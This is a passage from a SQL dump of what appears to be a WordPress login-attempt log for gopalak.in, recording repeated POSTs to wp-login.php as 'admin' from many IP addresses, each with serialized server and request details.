Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46096\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.38.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746921775.5032949;s:12:\"REQUEST_TIME\";i:1746921775;}}','63.250.38.36',0,'2025-05-11 05:32:57','1970-01-01 00:00:00'),(95393,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43546\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746922140.8099689;s:12:\"REQUEST_TIME\";i:1746922140;}}','192.64.117.43',0,'2025-05-11 05:39:02','1970-01-01 00:00:00'),(95394,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50960\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746922504.4535;s:12:\"REQUEST_TIME\";i:1746922504;}}','67.223.118.131',0,'2025-05-11 05:45:06','1970-01-01 00:00:00'),(95395,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40850\";s:11:\"REMOTE_ADDR\";s:14:\"199.188.200.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746922871.2270241;s:12:\"REQUEST_TIME\";i:1746922871;}}','199.188.200.55',0,'2025-05-11 05:51:12','1970-01-01 00:00:00'),(95396,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34698\";s:11:\"REMOTE_ADDR\";s:13:\"103.163.214.6\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746923236.0005031;s:12:\"REQUEST_TIME\";i:1746923236;}}','103.163.214.6',0,'2025-05-11 05:57:17','1970-01-01 00:00:00'),(95397,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48074\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746923601.0542109;s:12:\"REQUEST_TIME\";i:1746923601;}}','103.191.76.181',0,'2025-05-11 06:03:22','1970-01-01 00:00:00'),(95398,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42888\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746923965.1722209;s:12:\"REQUEST_TIME\";i:1746923965;}}','68.65.123.76',0,'2025-05-11 06:09:27','1970-01-01 00:00:00'),(95399,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57120\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.73\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746924686.8954029;s:12:\"REQUEST_TIME\";i:1746924686;}}','162.0.232.73',0,'2025-05-11 06:21:28','1970-01-01 00:00:00'),(95400,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56972\";s:11:\"REMOTE_ADDR\";s:15:\"103.179.190.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746925049.792418;s:12:\"REQUEST_TIME\";i:1746925049;}}','103.179.190.244',0,'2025-05-11 06:27:31','1970-01-01 00:00:00'),(95401,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42428\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.100\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746925415.9640429;s:12:\"REQUEST_TIME\";i:1746925415;}}','198.187.29.100',0,'2025-05-11 06:33:37','1970-01-01 00:00:00'),(95402,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42046\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.233\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746926150.111557;s:12:\"REQUEST_TIME\";i:1746926150;}}','68.65.120.233',0,'2025-05-11 06:45:51','1970-01-01 